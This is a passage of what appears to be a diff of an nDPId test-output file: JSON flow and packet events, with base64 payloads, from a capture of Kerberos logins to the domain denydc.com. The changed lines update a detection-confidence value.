02054{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946716067526,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1229,"pkt_l4_len":1195,"thread_ts_msec":946716067526,"pkt":"AAP\/p6sMAAP\/pqsMCABFAAS\/SOAAAIARykUKBQMBCgEMAgBYBCwEqyGEbYIEnzCCBJugAwIBBaEDAgENowwbCkRFTllEQy5DT02kEDAOoAMCAQGhBzAFGwNkZXOlggN0YYIDcDCCA2ygAwIBBaEMGwpERU5ZREMuQ09Noh8wHaADAgECoRYwFBsGa3JidGd0GwpERU5ZREMuQ09No4IDNDCCAzCgAwIBF6EDAgECooIDIgSCAx6vJykUYq7rXgspxAjLDVvb\/eZ\/5SrdtOCJzqXUtt2Ah28Wot4qbXjaGxnLhBAQCoQatRNPUUAPrQ8zoml9NWokGWomJv2qTEivbx60WTGui08nHOfUk7F5qQH9bhtJ8abeZf4t+DjAEokvn7ksEkhPny6zq1MrOGAVB4Ul9SIAQzxOeI\/OpAGQD8ceGXAVh2mZar8I6BSGPY3dyelogzcpLkjfnWgD6u9FAYv7fwZScCXowx4Ajl3lVBIIxu3HXbdLeoV64LDJ9L47nLS7\/sNoqSZLrAE8Bh1KTK\/3jczuD4uDNaT3DImLzkK\/fJsgLOfE9n\/2TEsqPtnYiZfdZLA3cuodRWE7478J\/LK1zer68y5eihQHLQsEz1iYLZvrWp1mxXgY31KPd7DlEySrVH4V0SP9tDhG9Pq0KeDBWGByHBytauJJ0BCz8KepRMF9V8VjDRkIqa6fzCw7Wn2PrTGQYj4H+\/gHTLjuBA6muibnCaep\/PCHjAXWUtFhQa4fyxoBfg7dIcpGdJk46w8dkUiJScAZeH5a1aLrO9BEtcyjalAqUdpw9mIcWL50BW8CvQtPKBvVUcxLUQStoAENW90O31IBEJOeVsstA0IssuFCUMFJBomyVXqrk3M2ys+dCavzcpFw8VySmRzlp\/zkPrsvHrNco78fht26hcgazpRKQKhie9ZWnbX4pxmFG2OUwqtsk8QYG\/P1n0MbH1Y7i4TBZhRbNG4o5Bh5lvgbHRi0OsCLCI6r8BuwvTEpaZE9dQAkn8zHGZ7Wvm6ogSO3Ehe00DhO3BtemeBb2GCd\/7oTTtFtkmoAy+R+52MYDbp7XV1rhUtrrh2Beenw+1kKhgBAIu\/L4tnzMRm\/\/67kp1BQMtgMn\/Ya1sZSp9Wh+AeHxLdggXxaLidmGf3uML8PIGgOkOC\/PzXyXbzQr2Ztwkf98KcJALe6znANzSqsjAHTIGRoYLLaIo8wV65YOPXMvbomM4liduHgsE17Z0zbX2bWGR3n3VJvKMzI8MThIOCSaSabidZ9fdhXaGIe3kEsws0rNf7ervrXKA2f2LhzYA2mgfYwgfOgAwIBA6KB6wSB6LNxqnKZoBpVseqJF63SOoWKwxsKkbRKUcgerkds+Ze7+WHPbMBENUdvuM93lTtPNuD3VFE4ejhUJ2WV2pVN1Ntr\/jegcZxqISsi7WOnNPd1U07BpdVdLZ09DJiqymXLMDvFQrcI2QQFgDeS5uBE8nSM\/a\/SRbUjGKHI\/6yYlC0GpktmAui+zE40fGuY5n5ZpOZz8nBIv+PyNMML5Tr7EUUS06rJ6+Ly\/EsnBNSSzmpZ\/tyCcHdf3vL4ZAh5KT\/katkpJUYRXHxevx7bGMx3eQLUIpbqvIeNE93m6dinwq01lAEpOLLMrws="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067819,"flow_last_seen":946716067819,"flow_idle_time":200000,"flow_min_l4_payload_len":1208,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1208,"flow_avg_l4_payload_len":1208,"midstream":0,"thread_ts_msec":946716067819,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1069,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02070{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946716067819,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1250,"pkt_l4_len":1216,"thread_ts_msec":946716067819,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATUAMoAAIAREkcKAQwCCgUDAQQtAFgEwPDJbIIEtDCCBLChAwIBBaIDAgEMo4IEMTCCBC0wggQpoQMCAQGiggQgBIIEHG6CBBgwggQUoAMCAQWhAwIBDqIHAwUAAAAAAKOCA2xhggNoMIIDZKADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMsMIIDKKADAgEXoQMCAQKiggMaBIIDFnaHOkbe3Ft95M1wKu8wrnnL2KoXK50Wfms4lwl+7nIzTWt\/TBTBxetLCu0b6OiVj3UpYznp3lazrMq98Qwi3aS0sEdZBoJs+Etqw0r7qbOiqGfIzfY5WW7lW95ehl68DOwN7G\/ctJKk8AVM30BgdXD8tz49IVb5LvH8kWVdyLTL7dDroB1zpLEnsskNCGiPKC2kvI4rVQFX\/skMLVm0vrv\/AnhykPJFywmuBCVaX4ilWguDR\/hhedFfzOYZ0xf7kVQmFePGaBfPtyf2tWMm316XiQ6a0ddMjedbQTEPUEaIPhU11lAXVTRXuGNNrbinzU88d0vpPunmiXEQ46Zb2aBwhA2PddlJfkphuRTiKTMYIcDx\/1mQSbo6IMs5BzF09EwRlqL20WWEy+tJbg8F96jQFX9ZfusZkqo2\/Ymtt2KIXO2vcTHWCJfKNWi2oHePkmjQVNqV44BDHKJhg2yYGzOpsCLcIH9xI3jIsbhcV3lnOJelJiIh\/BOztlBncxQJDGM8Ss5lpzuieNTaBQOQBzYsANr2gDw7i5E2tKUZxxU28uYbVQUK6KZjtJp0woRjxeXkug7EiwanRJ+ruwFN4641BrWk2WV7znZLMnOxd9Ixgq276dbW3uk8XghmBk5iO9uBY9B6bl2XBCrn0zJxWO550J7YNhBLCWnZolKhh691S4S\/sMyb9cBhQt9YOq11SPy9kRuQfEqcmeMSn67AgOzJ8mzxQ8a3rs4hfqkn1jH+UhGi1xla+MUNFmVkVcF\/s3a9sERXKT\/GEeYJDkvNw+esHfCK4jalR0pA558BA3fanPrnNu74qdrmsUgOhPibVBiVBOhTvitLl0hsJU5z6U77MFSX4UMd9nw2kPOVPhabSvF2baihVP5t9x+qShNJPWM56UisG6Ab7JzsId2uQf1lTt49iVnnhmjdWddhTtm47iqqL0nJrz7QZtWxYyMQTTtuJpTJCO76PmTywwSdY3tKlhuq3MxMZlzDeglX6VXTiBXGqdqJOfHm8VsI+LTATS2a9Dxo3ZxAgK9aL5NMKTnSmEBKpJmkgY4wgYugAwIBA6KBgwSBgNL0L+xYmPXFJ2U4kmPBnFHcqQ2kURDhc7sJ1m4jCUZ3aGX1OMmCD0W3u83F3YAN1E64NrK4rVi0jv0dwvc6PCbHAYvM6a0Q4aMYH5PjvHNv0XCuHkBNezkY7kSGMz7+UmeXeYM8t7nSKwEidTLd6P+W3RDUXi0Wg6\/u3kiBOewCpG8wbaAHAwUAQIAAAKIMGwpERU5ZREMuQ09Nox4wHKADAgECoRUwExsEY2lmcxsLVlBDLVcySzNFTlSlERgPMjAzNzA5MTMwMjQ4MDVapwYCBAtX7q+oGTAXAgEXAgL\/ewIBgAIBAwIBAQIBGAIC\/3k="} -00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067819,"flow_last_seen":946716067819,"flow_idle_time":200000,"flow_min_l4_payload_len":1208,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1208,"flow_avg_l4_payload_len":1208,"midstream":0,"thread_ts_msec":946716067819,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1069,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067819,"flow_last_seen":946716067819,"flow_idle_time":200000,"flow_min_l4_payload_len":1208,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1208,"flow_avg_l4_payload_len":1208,"midstream":0,"thread_ts_msec":946716067819,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1069,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02048{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":946716067819,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1228,"pkt_l4_len":1194,"thread_ts_msec":946716067819,"pkt":"AAP\/p6sMAAP\/pqsMCABFAAS+SRYAAIARyhAKBQMBCgEMAgBYBC0EqnlmbYIEnjCCBJqgAwIBBaEDAgENowwbCkRFTllEQy5DT02kEDAOoAMCAQGhBzAFGwNkZXOlggNzYYIDbzCCA2ugAwIBBaEMGwpERU5ZREMuQ09Noh4wHKADAgECoRUwExsEY2lmcxsLVlBDLVcySzNFTlSjggM0MIIDMKADAgEXoQMCAQmiggMiBIIDHqJ3xhJCOmnFhZcsfMi2k4AT3rpZUNDYWBgoBh3cCWwv3e\/6+fQvFTO8hJ00nDGPbF+\/RK62MoQ9fPP4MpnKhllWK8yjd2Pq6SPPUy1uAMfZFf4orggr2DXR5JbzE3nW8WHiTRJ89yk1S1V2P6Z0fqxMm1j\/oZ\/1T275Ok0CBW636P049zssULQkvCrNUUOPFwn6yEW4DKTWV6M3b7pEdMH0+jUsep4+M+4u+lATLJjUHV+M5ZxNjXUlbrnLpswgF3HQelRvuq3JlgwilWFg5yaK4oPONBIVuQRk\/dqjdDMqrliP+rekdrP\/Ntg0jzs+b7eZyqTajH71RxQdBtMoH7JFSNC0mpJuc9vkTpL8o2KveZDFX\/Jvts3JSQpy5Vf7RT2Xqim6BY\/6VjogqyZntyKUIPCf7fZ0MtnTicJkn+mCmSfkVxh54K1JzoyuBfNhohPsvA8yuv8s4P45LUoEMVprzZlnnKa5DPOyra7+zKWxoOmSV75rMLf1Q9ABsUNjukQWju0dcW45lJsPNa5jO6ExcxMGHsGfh5AI2OaBns2AEsD6BSU014ETQmVD7hiWI3yTaBi9ZYaCqFP543PEZ5tECSE9wOO9D3\/0p68Dyj8Jfx8HLGP3SucODMSnWClZRo00Ef5qAN8eSxFJpyDCJ5qmzY3gJILb\/mI16k2onygx5PwwYyf+KeUSQs1xSXJBTutUkUtBRv79jItwbl2O4ieTQZJeq6zQlABX3iza26xr4Nz+1WMWQzFijYd\/jpeKS7chsuX7h53\/nAj2AmSvTMExybNZu7lwWMOnL+\/VZBGwBdzpOPz5O2kuY3LkqvMO4vLpSTbav2hmSeGcGXCcalM7Jmw9zDVo2T5ScmAc0\/SXhn8Rzilrg\/OFjnZHCMOOdCGJNYNGWRuKSmj3yMsHbSQvesvgMvmFO0aSJQevbtZLRRLDRU4+Gh3FBsKzARnBIBjhyX6dj9OCbnAmj67xR44zBFfCstdL6a\/t17pLPnzwTYkNdamLXZn3sy3mcu6JToxloCBDsMb6lwkzkR2avyKLd0E83r3fd1zroZqU8KaB9jCB86ADAgEDooHrBIHotE3dMV7Nt6gGi\/VNhEhGOtqLUcP+uRJADDp0dHHjNSrc2MEGngFDiSU3IvPOQq2wSiGPvDqearPQ5ihBA\/Jb7pz7cJQAjuYx16sOfNoUgko2obQgzM63LPHsqiZ\/2Y8oyAYmAzZFsfALvarciWmxMSZQvgzJOayGHVpKKzhU1XHbqK5ZqBrKEdowVUsmTSO3irN7h1MfgNrKRBzrqypW+0W6RbyX+2p2cT1smrcGsERPDMuaaNKW3HCm4HZqQavWEeM+XalCmQCzSt+ffuU2rtt3IHZk8L70YUm9Fxg8biTCr5OiBpt6DA=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716089644,"flow_last_seen":946716089644,"flow_idle_time":200000,"flow_min_l4_payload_len":1233,"flow_max_l4_payload_len":1233,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":1233,"midstream":0,"thread_ts_msec":946716089644,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1074,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02103{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946716089644,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1275,"pkt_l4_len":1241,"thread_ts_msec":946716089644,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATtAUEAAIAREbcKAQwCCgUDAQQyAFgE2RcQbIIEzTCCBMmhAwIBBaIDAgEMo4IEMTCCBC0wggQpoQMCAQGiggQgBIIEHG6CBBgwggQUoAMCAQWhAwIBDqIHAwUAAAAAAKOCA2xhggNoMIIDZKADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMsMIIDKKADAgEXoQMCAQKiggMaBIIDFnaHOkbe3Ft95M1wKu8wrnnL2KoXK50Wfms4lwl+7nIzTWt\/TBTBxetLCu0b6OiVj3UpYznp3lazrMq98Qwi3aS0sEdZBoJs+Etqw0r7qbOiqGfIzfY5WW7lW95ehl68DOwN7G\/ctJKk8AVM30BgdXD8tz49IVb5LvH8kWVdyLTL7dDroB1zpLEnsskNCGiPKC2kvI4rVQFX\/skMLVm0vrv\/AnhykPJFywmuBCVaX4ilWguDR\/hhedFfzOYZ0xf7kVQmFePGaBfPtyf2tWMm316XiQ6a0ddMjedbQTEPUEaIPhU11lAXVTRXuGNNrbinzU88d0vpPunmiXEQ46Zb2aBwhA2PddlJfkphuRTiKTMYIcDx\/1mQSbo6IMs5BzF09EwRlqL20WWEy+tJbg8F96jQFX9ZfusZkqo2\/Ymtt2KIXO2vcTHWCJfKNWi2oHePkmjQVNqV44BDHKJhg2yYGzOpsCLcIH9xI3jIsbhcV3lnOJelJiIh\/BOztlBncxQJDGM8Ss5lpzuieNTaBQOQBzYsANr2gDw7i5E2tKUZxxU28uYbVQUK6KZjtJp0woRjxeXkug7EiwanRJ+ruwFN4641BrWk2WV7znZLMnOxd9Ixgq276dbW3uk8XghmBk5iO9uBY9B6bl2XBCrn0zJxWO550J7YNhBLCWnZolKhh691S4S\/sMyb9cBhQt9YOq11SPy9kRuQfEqcmeMSn67AgOzJ8mzxQ8a3rs4hfqkn1jH+UhGi1xla+MUNFmVkVcF\/s3a9sERXKT\/GEeYJDkvNw+esHfCK4jalR0pA558BA3fanPrnNu74qdrmsUgOhPibVBiVBOhTvitLl0hsJU5z6U77MFSX4UMd9nw2kPOVPhabSvF2baihVP5t9x+qShNJPWM56UisG6Ab7JzsId2uQf1lTt49iVnnhmjdWddhTtm47iqqL0nJrz7QZtWxYyMQTTtuJpTJCO76PmTywwSdY3tKlhuq3MxMZlzDeglX6VXTiBXGqdqJOfHm8VsI+LTATS2a9Dxo3ZxAgK9aL5NMKTnSmEBKpJmkgY4wgYugAwIBA6KBgwSBgCnqqVTOVTpRzUXbeXaxK103wBWopURudtcug5Pe2sVn\/riDmysWHTfCcQh3A3iGP8I+3waJbA4vV2gXfJBBaCZePRcTa1JTarqNL46zUmLWaZiZRkM4aFGbLQzFVKKq4D+wB\/EE+nzyNOnIx0R2uErXwvhiOneUFFTaQBV4czpYpIGHMIGEoAcDBQBAgAAAogwbCkRFTllEQy5DT02jNTAzoAMCAQKhLDAqGwRsZGFwGxZ2cGMtdzJrM2VudC5kZW55REMuY29tGwpkZW55REMuY29tpREYDzIwMzcwOTEzMDI0ODA1WqcGAgQXCEP6qBkwFwIBFwIC\/3sCAYACAQMCAQECARgCAv95"} -00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716089644,"flow_last_seen":946716089644,"flow_idle_time":200000,"flow_min_l4_payload_len":1233,"flow_max_l4_payload_len":1233,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":1233,"midstream":0,"thread_ts_msec":946716089644,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1074,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716089644,"flow_last_seen":946716089644,"flow_idle_time":200000,"flow_min_l4_payload_len":1233,"flow_max_l4_payload_len":1233,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":1233,"midstream":0,"thread_ts_msec":946716089644,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1074,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02119{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946716089644,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1279,"pkt_l4_len":1245,"thread_ts_msec":946716089644,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATxSg4AAIARyOUKBQMBCgEMAgBYBDIE3VF0bYIE0TCCBM2gAwIBBaEDAgENowwbCkRFTllEQy5DT02kEDAOoAMCAQGhBzAFGwNkZXOlggOKYYIDhjCCA4KgAwIBBaEMGwpERU5ZREMuQ09NojUwM6ADAgECoSwwKhsEbGRhcBsWdnBjLXcyazNlbnQuZGVueURDLmNvbRsKZGVueURDLmNvbaOCAzQwggMwoAMCARehAwIBCaKCAyIEggMeL\/RA92hD58Dn12Da9QWkJWnEJfArUcc4UzBD9SxldwhmoXd6\/obVbyD0LWmpxcMuaZeRlgizu0rrrcQTZgqtJbxXZlDfyJE2TYQcKUX3Isl\/Odh3JBqXColTPRxC6pkdGeZ3HzYaP0RgU8+UeyCvsTxoDY+foR\/W4Y90imjwA6kcoYW6sBqL9UtA9Xz16o6dXVtqa6a1X4vyB0tkj+dh2H1y3susl46D9QQ5x\/oPLYZ8vYlSw0kM0hvomNAEtbgGVvXv5KcQ139NIHAFoW9R+YkzlJTOfTMwZJRFug50mo3QBD+vmX3YrnLygH3Vcn9ZdN\/lx\/2ItwFMy9+zAmhaJgkW1wX0eu80ixoWoj63+2QNJP526LuZeHn3wt5S3Ez8VVrm0NwykytkVwh+pIWtIZumNqVHExRHbeBUs+HQZco2FIAUysiMl0p0V\/9dYr6NYjFP5SSBe0JQ3ME5PcKqJb80HkTTrAi02f+vIRD0oZd7kx1z0ODX0zskLyx4MuxgfLA+rSgSP6ZUJ055iGahoaVYV9SpPKq+xhCqQFrM7itVACVV7bPJb4QOCt0YwnE0k4YXIyrvjeBwv0TOma+s+Pk26lkmMFohcPPh09SzjbX0LB\/nJU50kl9cOX2RxsnwUxKT64ptV3lFerWVRZ12Rc3nEkevi1b0jJR2PvD7qdm+9x+y4SEkM\/\/znR8jp89KJJfBF1eWXO0dCwgdxUvGxXup\/11HbQS835yW613qHegtnxeXM32CN7BzUPXgbyMrtsocu7vMq7UlNyQL7E27QrzqcIFv7LOWlgBboWP1YYaRCId3CM+v4T\/pcXJx8p0oBnuk8CcRVdoK0SRZww8Uqrg9ipusyREzOOn5tKh1+iWwmAHsizSVWrxInciFG7a1LG3nuYzOwn32U386KlMqGU6x25EYlN1ggNms4IEAxNRZ9xLubotb9xpgHo0ztJXAiCXUH9SE5l2LEDVRzVVcdQV0MPOIzTH\/FZXOa+1tc\/VB08Euy6Bd9na1dbJC9l+Kd21RirJtQ\/T\/0emeJAuVMlmbNxMRxTOQmtTp\/97VpoIBETCCAQ2gAwIBA6KCAQQEggEA8si\/bBGBs0rUs1jXOMObOPMCGmnmTeYlITZW2Wf7sQuBm2SroBfjBri2Z6F9uf3iTF6vCeonbX\/GTWX1Fvcn4uofVntZgvKbdTYkS2d+XFlnruh6P7jVYUezZEoZ8jiGv\/7mm8cprC3zuOzFEDYf7uc8F2nfwaCV8PaBg9p0Jm9+AIzOC2RF7FIdXj9K7GxajcLfzQoBHPOwHqq+anZFZIIUbyjGHPoi2E08Q2cBRBpSYup4O2rhZWb3KhCBYNUzUXpz7EYdkd6s3PjMi8A838Qz4Z1fa3\/7uf0A9ZBBfu8ebbU0HVSPSZkGJL4JCwophGSoBFsnlIMRG1O0GkJa2A=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716089757,"flow_last_seen":946716089757,"flow_idle_time":200000,"flow_min_l4_payload_len":1219,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":1219,"flow_avg_l4_payload_len":1219,"midstream":0,"thread_ts_msec":946716089757,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1076,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946716089757,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1261,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1261,"pkt_l4_len":1227,"thread_ts_msec":946716089757,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATfAUsAAIAREbsKAQwCCgUDAQQ0AFgEyxJubIIEvzCCBLuhAwIBBaIDAgEMo4IEMTCCBC0wggQpoQMCAQGiggQgBIIEHG6CBBgwggQUoAMCAQWhAwIBDqIHAwUAAAAAAKOCA2xhggNoMIIDZKADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMsMIIDKKADAgEXoQMCAQKiggMaBIIDFnaHOkbe3Ft95M1wKu8wrnnL2KoXK50Wfms4lwl+7nIzTWt\/TBTBxetLCu0b6OiVj3UpYznp3lazrMq98Qwi3aS0sEdZBoJs+Etqw0r7qbOiqGfIzfY5WW7lW95ehl68DOwN7G\/ctJKk8AVM30BgdXD8tz49IVb5LvH8kWVdyLTL7dDroB1zpLEnsskNCGiPKC2kvI4rVQFX\/skMLVm0vrv\/AnhykPJFywmuBCVaX4ilWguDR\/hhedFfzOYZ0xf7kVQmFePGaBfPtyf2tWMm316XiQ6a0ddMjedbQTEPUEaIPhU11lAXVTRXuGNNrbinzU88d0vpPunmiXEQ46Zb2aBwhA2PddlJfkphuRTiKTMYIcDx\/1mQSbo6IMs5BzF09EwRlqL20WWEy+tJbg8F96jQFX9ZfusZkqo2\/Ymtt2KIXO2vcTHWCJfKNWi2oHePkmjQVNqV44BDHKJhg2yYGzOpsCLcIH9xI3jIsbhcV3lnOJelJiIh\/BOztlBncxQJDGM8Ss5lpzuieNTaBQOQBzYsANr2gDw7i5E2tKUZxxU28uYbVQUK6KZjtJp0woRjxeXkug7EiwanRJ+ruwFN4641BrWk2WV7znZLMnOxd9Ixgq276dbW3uk8XghmBk5iO9uBY9B6bl2XBCrn0zJxWO550J7YNhBLCWnZolKhh691S4S\/sMyb9cBhQt9YOq11SPy9kRuQfEqcmeMSn67AgOzJ8mzxQ8a3rs4hfqkn1jH+UhGi1xla+MUNFmVkVcF\/s3a9sERXKT\/GEeYJDkvNw+esHfCK4jalR0pA558BA3fanPrnNu74qdrmsUgOhPibVBiVBOhTvitLl0hsJU5z6U77MFSX4UMd9nw2kPOVPhabSvF2baihVP5t9x+qShNJPWM56UisG6Ab7JzsId2uQf1lTt49iVnnhmjdWddhTtm47iqqL0nJrz7QZtWxYyMQTTtuJpTJCO76PmTywwSdY3tKlhuq3MxMZlzDeglX6VXTiBXGqdqJOfHm8VsI+LTATS2a9Dxo3ZxAgK9aL5NMKTnSmEBKpJmkgY4wgYugAwIBA6KBgwSBgIndYoByC0Q1XL0UkOvReJuk4xMaMJZ+vSX6nvaGHvlQj3sSa06PNSHAnkgj2fx7dbMK5tj+L9hKHDtvRMSujXv2qbqzBpKBYUbifiIw78VvOSWvJj++dB3YwIymbxfa9M6swpxkLP2l4B8pAcaGNYjj1\/qFZcDwa0BSttxF6Oj4pHoweKAHAwUAQIAAAKIMGwpERU5ZREMuQ09NoykwJ6ADAgECoSAwHhsEY2lmcxsWdnBjLXcyazNlbnQuZGVueWRjLmNvbaURGA8yMDM3MDkxMzAyNDgwNVqnBgIEFxtNVagZMBcCARcCAv97AgGAAgEDAgEBAgEYAgL\/eQ=="} -00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716089757,"flow_last_seen":946716089757,"flow_idle_time":200000,"flow_min_l4_payload_len":1219,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":1219,"flow_avg_l4_payload_len":1219,"midstream":0,"thread_ts_msec":946716089757,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1076,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716089757,"flow_last_seen":946716089757,"flow_idle_time":200000,"flow_min_l4_payload_len":1219,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":1219,"flow_avg_l4_payload_len":1219,"midstream":0,"thread_ts_msec":946716089757,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1076,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02078{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946716089757,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1247,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1247,"pkt_l4_len":1213,"thread_ts_msec":946716089757,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATRShcAAIARyPwKBQMBCgEMAgBYBDQEvQ3obYIEsTCCBK2gAwIBBaEDAgENowwbCkRFTllEQy5DT02kEDAOoAMCAQGhBzAFGwNkZXOlggN+YYIDejCCA3agAwIBBaEMGwpERU5ZREMuQ09NoikwJ6ADAgECoSAwHhsEY2lmcxsWdnBjLXcyazNlbnQuZGVueWRjLmNvbaOCAzQwggMwoAMCARehAwIBCaKCAyIEggMe5TejCbdku0sWZODEt+E6OUUMN8VOBkx3zELMQY51bnq2VGhql9SORJyvnK1dFg3jJFS5YPbufxVK9xIZbgEt\/yDkgZFT5ywKZAKUVb5fAeaPY75m6bqAKC9WYz\/BMnDZkwMeSJNr0+Trx8kOf+lNHo7QaR\/P\/+Yk79pv+bK8dl3BmX179458+zSycepAJTN06KRQPVfIea\/xqQ51qJ4YEz\/4CLsKDYszv2gdnSQ1ToQrDMA1DRr9Sk05eeaPB\/+aVDNjsnrJprgd8Dr\/+WyaOqFvJG6A1NE+Lzgqy0b9oQ83dkq4UUtvg30Ai6XfnzIIX\/OdPmFFp0EzafxnejewUcIxBl3+G9Z0R7yzkwR2HRxTry2FP72dUBIAiRF5tU4KZElhfHzVmsIPi0NhGo8Nr8\/PgyGR43Tkbp4I2D8AmBmCa9wr68BV2fUhNcy7XG4\/nFiInqV8vHnjBSRfrJApZh0\/Mg5s8i